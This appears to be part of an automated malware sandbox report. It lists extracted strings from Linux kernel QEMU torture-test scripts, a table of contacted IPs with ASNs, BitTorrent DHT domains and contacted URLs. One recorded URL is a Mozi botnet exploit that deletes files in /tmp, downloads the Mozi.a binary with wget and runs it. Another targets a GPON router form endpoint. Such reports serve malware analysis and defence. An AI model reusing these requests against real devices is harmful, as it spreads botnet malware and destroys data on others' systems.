Source: functions.sh0.8.dr Binary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
Source: kvm-recheck-lock.sh.8.dr Binary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: kvm-test-1-run.sh.8.dr Binary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
Source: functions.sh0.8.dr Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm.sh.8.dr Binary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
Source: functions.sh0.8.dr Binary or memory string: identify_qemu_append () {
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo Grace period for qemu job at pid $qemu_pid
Source: functions.sh0.8.dr Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_args="-enable-kvm -soundhw pcspk -nographic $qemu_args"
Source: functions.sh0.8.dr Binary or memory string: # Returns our best guess as to which qemu command is appropriate for
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.8.dr Binary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
Source: kvm-test-1-run.sh.8.dr Binary or memory string: QEMU="`identify_qemu $builddir/vmlinux`"
Source: functions.sh0.8.dr Binary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
Source: functions.sh0.8.dr Binary or memory string: identify_qemu_args () {
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $builddir/console.log
Source: functions.sh0.8.dr Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
Source: kvm-test-1-run.sh.8.dr Binary or memory string: # Generate -smp qemu argument.
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
Source: functions.sh0.8.dr Binary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
Source: functions.sh0.8.dr Binary or memory string: # Output arguments for the qemu "-append" string based on CPU type
Source: kvm.sh.8.dr Binary or memory string: --qemu-args|--qemu-arg)
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
Source: functions.sh0.8.dr Binary or memory string: echo $TORTURE_QEMU_CMD
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_MAC=$2
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.8.dr Binary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
Source: functions.sh0.8.dr Binary or memory string: specify_qemu_cpus () {
Source: kvm-test-1-run.sh.8.dr Binary or memory string: vcpus=`identify_qemu_vcpus`
Source: functions.sh0.8.dr Binary or memory string: echo qemu-system-ppc64
Source: functions.sh0.8.dr Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
Source: kvm.sh.8.dr Binary or memory string: checkarg --qemu-args "-qemu args" $# "$2" '^-' '^error'
Source: functions.sh0.8.dr Binary or memory string: qemu-system-ppc64)
Source: functions.sh0.8.dr Binary or memory string: # identify_boot_image qemu-cmd
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_ARG="$2"
Source: kvm-recheck-rcu.sh.8.dr Binary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: functions.sh0.8.dr Binary or memory string: # identify_qemu_append qemu-cmd
Source: functions.sh0.8.dr Binary or memory string: identify_qemu_vcpus () {
Source: functions.sh0.8.dr Binary or memory string: # qemu-args already contains "-smp".
Source: kvm-test-1-run.sh.8.dr Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: functions.sh0.8.dr Binary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
Source: functions.sh0.8.dr Binary or memory string: echo Cannot figure out what qemu command to use! 1>&2
Source: functions.sh0.8.dr Binary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
Source: functions.sh0.8.dr Binary or memory string: # identify_qemu_vcpus
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_CMD="$2"
Source: functions.sh0.8.dr Binary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
Source: functions.sh0.8.dr Binary or memory string: # identify_qemu_args qemu-cmd serial-file
Source: functions.sh0.8.dr Binary or memory string: if test -n "$TORTURE_QEMU_CMD"
Source: kvm.sh.8.dr Binary or memory string: --qemu-cmd)
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_args=$5
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$builddir/console.log"`"
Source: kvm-test-1-run.sh.8.dr Binary or memory string: # Generate qemu -append arguments
Source: functions.sh0.8.dr Binary or memory string: # identify_qemu builddir
Source: functions.sh0.8.dr Binary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
Source: kvm-test-1-run.sh.8.dr Binary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
Source: functions.sh0.8.dr Binary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
Source: kvm.sh.8.dr Binary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
Source: functions.sh0.8.dr Binary or memory string: echo qemu-system-i386
Source: functions.sh0.8.dr Binary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
Source: functions.sh0.8.dr Binary or memory string: echo qemu-system-x86_64
Source: functions.sh0.8.dr Binary or memory string: identify_qemu () {

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
74.7.13.10
unknown United States
17184 ATL-CBEYONDUS false
171.221.181.48
unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
178.72.69.126
unknown Russian Federation
44257 TNGS-SOUTHRU false
84.50.142.113
unknown Estonia
3249 ESTPAKEE false
26.109.230.217
unknown United States
7922 COMCAST-7922US false
22.142.197.254
unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
44.209.53.252
unknown United States
14618 AMAZON-AESUS false
29.31.10.222
unknown United States
7922 COMCAST-7922US false
158.180.15.87
unknown United Kingdom
721 DNIC-ASBLK-00721-00726US false
11.242.227.131
unknown United States
3356 LEVEL3US false
26.220.204.225
unknown United States
7922 COMCAST-7922US false
93.102.56.19
unknown Portugal
2860 NOS_COMUNICACOESPT false
187.158.144.73
unknown Mexico
8151 UninetSAdeCVMX false
42.53.76.236
unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
56.182.70.51
unknown United States
2686 ATGS-MMD-ASUS false
154.3.17.209
unknown United States
174 COGENT-174US false
41.91.67.149
unknown Egypt
33771 SAFARICOM-LIMITEDKE false
180.254.89.180
unknown Indonesia
7713 TELKOMNET-AS-APPTTelekomunikasiIndonesiaID false
118.241.245.41
unknown Japan 2527 SO-NETSo-netEntertainmentCorporationJP false
19.214.106.48
unknown United States
3 MIT-GATEWAYSUS false
26.254.247.139
unknown United States
7922 COMCAST-7922US false
93.178.240.65
unknown Ukraine
6703 ALKAR-ASUA false
133.214.150.254
unknown Japan 2518 BIGLOBEBIGLOBEIncJP false
44.17.143.194
unknown United States
7377 UCSDUS false
113.153.230.119
unknown Japan 2516 KDDIKDDICORPORATIONJP false
89.157.51.131
unknown France
21502 ASN-NUMERICABLEFR false
189.241.241.142
unknown Mexico
8151 UninetSAdeCVMX false
124.57.147.225
unknown Korea Republic of
17858 POWERVIS-AS-KRLGPOWERCOMMKR false
69.20.178.197
unknown United States
6594 RISE-IDAHOUS false
81.176.95.215
unknown Russian Federation
8342 RTCOMM-ASRU false
66.221.30.106
unknown United States
54489 CORESPACE-DALUS false
109.143.31.175
unknown Belgium
5432 PROXIMUS-ISP-ASBE false
9.14.171.53
unknown United States
3356 LEVEL3US false
16.0.53.131
unknown United States
13979 ATT-IPFRUS false
172.195.124.44
unknown Australia
18747 IFX18747US false
21.245.113.206
unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
86.245.98.172
unknown France
3215 FranceTelecom-OrangeFR false
78.101.119.242
unknown Qatar
42298 GCC-MPLS-PEERINGGCCMPLSpeeringQA false
94.185.237.35
unknown United Kingdom
8190 MDNXGB false
102.37.69.46
unknown South Africa
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
68.238.109.13
unknown United States
701 UUNETUS false
21.176.167.107
unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
106.63.191.143
unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
144.57.215.199
unknown Sweden
39052 SKANSKANET-ASSE false
84.230.234.235
unknown Finland
719 ELISA-ASHelsinkiFinlandEU false
126.172.220.14
unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
174.231.155.97
unknown United States
22394 CELLCOUS false
122.128.194.105
unknown Korea Republic of
9757 CMBI-AS-KRCMBDONDAEMOONBROADCASTINGKR false
111.169.102.97
unknown Japan 2518 BIGLOBEBIGLOBEIncJP false
51.190.88.233
unknown United Kingdom
210278 SKYIT-BBIT false
1.71.162.33
unknown China
132147 CT-SHANXI-MANNo3Shu-MaRoadCN false
173.153.15.142
unknown United States
10507 SPCSUS false
157.39.16.40
unknown India
55836 RELIANCEJIO-INRelianceJioInfocommLimitedIN false
80.254.91.193
unknown Malta
15735 DATASTREAM-NETMT false
35.210.136.245
unknown United States
19527 GOOGLE-2US false
89.89.90.95
unknown France
5410 BOUYGTEL-ISPFR false
152.118.36.40
unknown Indonesia
3382 ERX-JUITA-UINETUniversityofIndonesiaID false
222.46.68.216
unknown China
9394 CTTNETChinaTieTongTelecommunicationsCorporationCN false
26.31.214.72
unknown United States
7922 COMCAST-7922US false
203.252.111.5
unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
55.44.238.153
unknown United States
306 DNIC-ASBLK-00306-00371US false
7.200.67.208
unknown United States
3356 LEVEL3US false
44.60.150.38
unknown United States
7377 UCSDUS false
207.23.25.29
unknown Canada
271 BCNET-ASCA false
91.117.98.122
unknown Spain
12334 Galicia-SpainES false
125.31.207.97
unknown China
17622 CNCGROUP-GZChinaUnicomGuangzhounetworkCN false
82.253.85.237
unknown France
12322 PROXADFR false
41.232.91.226
unknown Egypt
8452 TE-ASTE-ASEG false
171.198.145.203
unknown United States
10794 BANKAMERICAUS false
185.68.99.43
unknown Netherlands
201650 WEBGURUNL false
113.113.18.44
unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
104.174.200.127
unknown United States
20001 TWC-20001-PACWESTUS false
81.179.119.252
unknown United Kingdom
9105 TISCALI-UKTalkTalkCommunicationsLimitedGB false
175.159.53.19
unknown Hong Kong
7651 LINGNAN-AS-APLingnanUniversityHK false
13.92.116.235
unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
94.178.218.143
unknown Ukraine
6849 UKRTELNETUA false
184.216.173.25
unknown United States
10507 SPCSUS false
171.159.91.232
unknown United States
10794 BANKAMERICAUS false
189.222.218.142
unknown Mexico
8151 UninetSAdeCVMX false
152.125.208.240
unknown United States
29992 VA-TMP-COREUS false
97.70.224.8
unknown United States
33363 BHN-33363US false
209.232.145.19
unknown United States
23024 OCDEUS false
153.38.105.79
unknown United States
701 UUNETUS false
177.115.79.211
unknown Brazil
26599 TELEFONICABRASILSABR false
153.48.151.95
unknown United States
1226 CTA-42-AS1226US false
215.164.157.85
unknown United States
721 DNIC-ASBLK-00721-00726US false
134.35.254.248
unknown Yemen
30873 PTC-YEMENNETYE false
117.83.171.37
unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
82.129.200.140
unknown Egypt
24835 RAYA-ASEG false
161.118.201.239
unknown Japan 13041 CESCA-ACES false
42.55.27.34
unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
148.132.232.29
unknown United States
6400 CompaniaDominicanadeTelefonosSADO false
17.73.154.133
unknown United States
714 APPLE-ENGINEERINGUS false
51.74.229.172
unknown United States
2686 ATGS-MMD-ASUS false
90.178.36.52
unknown Czech Republic
5610 O2-CZECH-REPUBLICCZ false
158.119.251.77
unknown United Kingdom
49278 NORDEFNO false
172.101.9.198
unknown United States
11351 TWC-11351-NORTHEASTUS false
173.63.104.87
unknown United States
701 UUNETUS false
113.24.165.118
unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
184.253.253.190
unknown United States
10507 SPCSUS false

Contacted Domains

Name IP Active
dht.transmissionbt.com 212.129.33.59 true
bttracker.acc.umu.se 130.239.18.159 true
router.bittorrent.com 67.215.246.10 true
router.utorrent.com 82.221.103.244 true
bttracker.debian.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://13.89.231.175:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
unknown
http://127.0.0.1:80/GponForm/diag_Form?images/ true
  • Avira URL Cloud: safe